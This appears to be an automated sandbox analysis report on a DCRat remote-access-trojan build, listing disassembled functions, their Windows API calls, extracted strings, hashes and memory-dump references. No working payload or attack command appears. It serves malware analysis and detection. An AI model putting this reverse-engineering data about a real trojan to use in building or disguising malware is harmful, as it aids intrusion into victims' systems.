                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: f417a97678815749b550eb240b96f98b93c423724c6b306f8b93179635ac692e
                                                                                                                        • Instruction ID: c9fbc67616743b411af1bc528bcd1bd268e72b4c40eeabc1852fa8bafbd3e43b
                                                                                                                        • Opcode Fuzzy Hash: f417a97678815749b550eb240b96f98b93c423724c6b306f8b93179635ac692e
                                                                                                                        • Instruction Fuzzy Hash: A101243220D3112EAA542F777C89DE72B58EB0177AB60073FF010451F0EF99AE00916C
                                                                                                                        Function 004B97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,004D1030,004B4674,004D1030,?,?,004B3F73,00000050,?,004D1030,00000200), ref: 004B97E9
                                                                                                                        • _free.LIBCMT ref: 004B981C
                                                                                                                        • _free.LIBCMT ref: 004B9844
                                                                                                                        • SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B9851
                                                                                                                        • SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B985D
                                                                                                                        • _abort.LIBCMT ref: 004B9863
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3160817290-0
                                                                                                                        • Opcode ID: 4cd85ed6ee29d111f2d55b32e7d2a5657e9f20ba5869c79f10d269f9b5e3b589
                                                                                                                        • Instruction ID: 2106faaecfc57660f7bdc0d0eb2491778d76870c775223dbd99c199315b9bae0
                                                                                                                        • Opcode Fuzzy Hash: 4cd85ed6ee29d111f2d55b32e7d2a5657e9f20ba5869c79f10d269f9b5e3b589
                                                                                                                        • Instruction Fuzzy Hash: 87F0A43615460166C6923736AC4AFEB2A698FD2769F25013FF71492292EF2CCC06857D
                                                                                                                        Function 004ADC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004ADC47
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004ADC61
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004ADC72
                                                                                                                        • TranslateMessage.USER32(?), ref: 004ADC7C
                                                                                                                        • DispatchMessageW.USER32(?), ref: 004ADC86
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004ADC91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2148572870-0
                                                                                                                        • Opcode ID: b4d5a8bd2df11f069821cde4f3a15feba694b6cb86d2feca6302d1d8d627df76
                                                                                                                        • Instruction ID: bbba61a3d6380eea0937b856809c06dcd0571476c472fcb6a41a7da876738180
                                                                                                                        • Opcode Fuzzy Hash: b4d5a8bd2df11f069821cde4f3a15feba694b6cb86d2feca6302d1d8d627df76
                                                                                                                        • Instruction Fuzzy Hash: DDF08C32A00219BBCB206FA1DC0CDDF7F7CEF527A2B004022B50AD2014DA389656C7A4
                                                                                                                        Function 004AA80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004AA699: GetDC.USER32(00000000), ref: 004AA69D
                                                                                                                          • Part of subcall function 004AA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 004AA6A8
                                                                                                                          • Part of subcall function 004AA699: ReleaseDC.USER32(00000000,00000000), ref: 004AA6B3
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 004AA83C
                                                                                                                          • Part of subcall function 004AAAC9: GetDC.USER32(00000000), ref: 004AAAD2
                                                                                                                          • Part of subcall function 004AAAC9: GetObjectW.GDI32(?,00000018,?), ref: 004AAB01
                                                                                                                          • Part of subcall function 004AAAC9: ReleaseDC.USER32(00000000,?), ref: 004AAB99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                                                        • String ID: "J$($AJ
                                                                                                                        • API String ID: 1061551593-3844905542
                                                                                                                        • Opcode ID: 99445b0f6c5bf7d515c2b41debf66fb0c6b962cc21e6f4dc040b55795bf635f7
                                                                                                                        • Instruction ID: 02034e16a13b06e9a7bc230c6e08260b9e88f0ec03dcb27a708b34f13a37e548
                                                                                                                        • Opcode Fuzzy Hash: 99445b0f6c5bf7d515c2b41debf66fb0c6b962cc21e6f4dc040b55795bf635f7
                                                                                                                        • Instruction Fuzzy Hash: 0F91F171208341AFD650DF25C844E2BBBE8FFDA701F00496EF59AD3220DB34A956CB66
                                                                                                                        Function 0049C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004A05DA: _wcslen.LIBCMT ref: 004A05E0
                                                                                                                          • Part of subcall function 0049B92D: _wcsrchr.LIBVCRUNTIME ref: 0049B944
                                                                                                                        • _wcslen.LIBCMT ref: 0049C197
                                                                                                                        • _wcslen.LIBCMT ref: 0049C1DF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$_wcsrchr
                                                                                                                        • String ID: .exe$.rar$.sfx
                                                                                                                        • API String ID: 3513545583-31770016
                                                                                                                        • Opcode ID: 3ab8c45ac047dbdd4de0250acf56aa7e82ed652d579e7a6c5d19fdb0240ef471
                                                                                                                        • Instruction ID: c64ba0faa899ea13d4052da206dccb1bdd2506f458e736acc0836ec5285ae63f
                                                                                                                        • Opcode Fuzzy Hash: 3ab8c45ac047dbdd4de0250acf56aa7e82ed652d579e7a6c5d19fdb0240ef471
                                                                                                                        • Instruction Fuzzy Hash: 874159255403119ADF31AF749882A7B7BA8EF55748F20892FF8C16B281EB6C4D81C39D
                                                                                                                        Function 0049BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 0049BB27
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0049A275,?,?,00000800,?,0049A23A,?,0049755C), ref: 0049BBC5
                                                                                                                        • _wcslen.LIBCMT ref: 0049BC3B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CurrentDirectory
                                                                                                                        • String ID: UNC$\\?\
                                                                                                                        • API String ID: 3341907918-253988292
                                                                                                                        • Opcode ID: bd86a818bdc60faafb67cef11080740463e58507e340229978bb5469166f7b21
                                                                                                                        • Instruction ID: 2b71f5386379a7950851833acb380c88866a01f0e15a6fdd5b0a315f95a20b79
                                                                                                                        • Opcode Fuzzy Hash: bd86a818bdc60faafb67cef11080740463e58507e340229978bb5469166f7b21
                                                                                                                        • Instruction Fuzzy Hash: 5341C531400215B6DF21AF61EE01EEB7B68EF41355F10853FF954A3251DB78DE908AE8
                                                                                                                        Function 004ACD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 004ACD84
                                                                                                                          • Part of subcall function 004AAF98: _wcschr.LIBVCRUNTIME ref: 004AB033
                                                                                                                          • Part of subcall function 004A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0049C116,00000000,.exe,?,?,00000800,?,?,?,004A8E3C), ref: 004A1FD1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$CompareString
                                                                                                                        • String ID: <$HIDE$MAX$MIN
                                                                                                                        • API String ID: 69343711-3358265660
                                                                                                                        • Opcode ID: 1fa21b53e627b41444e14099671cc69397ad8fc2c93e559c5975aaf795d808ad
                                                                                                                        • Instruction ID: 1febcf4f52f2a033c21b50d7bba3d8d67062512f591685ab9f4f1e216f4bcfd8
                                                                                                                        • Opcode Fuzzy Hash: 1fa21b53e627b41444e14099671cc69397ad8fc2c93e559c5975aaf795d808ad
                                                                                                                        • Instruction Fuzzy Hash: E53166759002599EDF25CB51CC41EEF73B8AB26354F004567F906E7180EBB89A848F95
                                                                                                                        Function 004AAAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 004AAAD2
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 004AAB01
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 004AAB99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectRelease
                                                                                                                        • String ID: -J$7J
                                                                                                                        • API String ID: 1429681911-3530780739
                                                                                                                        • Opcode ID: 06dd1c43c39d516e28dfdfecbcf73a70ee1480bc39125d8e625d46a2a97376db
                                                                                                                        • Instruction ID: 5e7da809d03db3f100890407c6f67cc107d2ce8034d33e0f5e7f8a244f6e31b3
                                                                                                                        • Opcode Fuzzy Hash: 06dd1c43c39d516e28dfdfecbcf73a70ee1480bc39125d8e625d46a2a97376db
                                                                                                                        • Instruction Fuzzy Hash: D521FF72108304BFD3019FA5DC48D7FBFE9FB89356F04042AFA4592124DB319A64CB6A
                                                                                                                        Function 0049B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 0049B9B8
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0049B9D6
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0049B9E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                        • String ID: %c:\
                                                                                                                        • API String ID: 525462905-3142399695
                                                                                                                        • Opcode ID: 8fd712f9ddcc89447e2c855bc83804b4af65c39b5e23319102260a98b98ef8d8
                                                                                                                        • Instruction ID: 9bc781bfa1a3ddd49e51b57c2046cab82a8a81583b8119f265b0ba4dc17abeb5
                                                                                                                        • Opcode Fuzzy Hash: 8fd712f9ddcc89447e2c855bc83804b4af65c39b5e23319102260a98b98ef8d8
                                                                                                                        • Instruction Fuzzy Hash: B40145A3100311699E30AB76AD42D6BABACEE85370B40442FF544D2282EB2CD80082F9
                                                                                                                        Function 004AB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 004AB2BE
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 004AB2D6
                                                                                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 004AB304
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: GETPASSWORD1$xzN
                                                                                                                        • API String ID: 445417207-2191437676
                                                                                                                        • Opcode ID: e8cd090001a0111344f9c876b1193c0a694a5ecafc3e17524e1ea71b04f85a2c
                                                                                                                        • Instruction ID: 75f23da0eefe947da099c84705bf2ba2d7be4ef5a9cc19db24237c3af90320fd
                                                                                                                        • Opcode Fuzzy Hash: e8cd090001a0111344f9c876b1193c0a694a5ecafc3e17524e1ea71b04f85a2c
                                                                                                                        • Instruction Fuzzy Hash: 8B11C2329001147AEF219E659C49FBF3B6CEB2A711F000067FA45E2181C7A8995587A9
                                                                                                                        Function 004AB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadBitmapW.USER32(00000065), ref: 004AB6ED
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004AB712
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004AB744
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004AB767
                                                                                                                          • Part of subcall function 004AA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,004AB73D,00000066), ref: 004AA6D5
                                                                                                                          • Part of subcall function 004AA6C2: SizeofResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA6EC
                                                                                                                          • Part of subcall function 004AA6C2: LoadResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA703
                                                                                                                          • Part of subcall function 004AA6C2: LockResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA712
                                                                                                                          • Part of subcall function 004AA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004AB73D,00000066), ref: 004AA72D
                                                                                                                          • Part of subcall function 004AA6C2: GlobalLock.KERNEL32(00000000), ref: 004AA73E
                                                                                                                          • Part of subcall function 004AA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 004AA762
                                                                                                                          • Part of subcall function 004AA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004AA7A7
                                                                                                                          • Part of subcall function 004AA6C2: GlobalUnlock.KERNEL32(00000000), ref: 004AA7C6
                                                                                                                          • Part of subcall function 004AA6C2: GlobalFree.KERNEL32(00000000), ref: 004AA7CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                        • String ID: ]
                                                                                                                        • API String ID: 1797374341-3352871620
                                                                                                                        • Opcode ID: 8951b234e36af5e5c527f06b58de6241c3d24aa9161a405b3731439a96f3ebd3
                                                                                                                        • Instruction ID: 55ebd56465e5bad516eadc04d8e41ff0409b86fac44112e933b387d7d6023c8c
                                                                                                                        • Opcode Fuzzy Hash: 8951b234e36af5e5c527f06b58de6241c3d24aa9161a405b3731439a96f3ebd3
                                                                                                                        • Instruction Fuzzy Hash: FD01043A9001016BD7127B749C09A7F7AB9DFD2B56F04002BF900A7396DF698D2586A9
                                                                                                                        Function 004AD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 004AD64B
                                                                                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 004AD661
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 004AD675
                                                                                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 004AD684
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: RENAMEDLG
                                                                                                                        • API String ID: 445417207-3299779563
                                                                                                                        • Opcode ID: a3bb297fe697ec6448ced0ba5d22f26e285615624f5dd27da924088ebcd07b11
                                                                                                                        • Instruction ID: 4b8699fd8ff3da2c54d278bc8b739ecd1e5b282e7a006b0230907182bc8acd02
                                                                                                                        • Opcode Fuzzy Hash: a3bb297fe697ec6448ced0ba5d22f26e285615624f5dd27da924088ebcd07b11
                                                                                                                        • Instruction Fuzzy Hash: 90012833A44210BAD2104F649E09F6B7B5CFB7BB02F214433F306A65D1C6AA9A15C77E
                                                                                                                        Function 004B7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004B7E24,00000000,?,004B7DC4,00000000,004CC300,0000000C,004B7F1B,00000000,00000002), ref: 004B7E93
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004B7EA6
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,004B7E24,00000000,?,004B7DC4,00000000,004CC300,0000000C,004B7F1B,00000000,00000002), ref: 004B7EC9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 62d22792f43562a57d86ea1594da04026232fda2899b67e8a0c9a09240d70e35
                                                                                                                        • Instruction ID: d65f153edc481f58c4607b22dfbaeff26e5eea2d2c51364b0080b7c013d35d8d
                                                                                                                        • Opcode Fuzzy Hash: 62d22792f43562a57d86ea1594da04026232fda2899b67e8a0c9a09240d70e35
                                                                                                                        • Instruction Fuzzy Hash: 7AF06835900208BBCB559FA5DC09FDEBFB4EF44716F0181BAF805A6250DB359E44CAAC
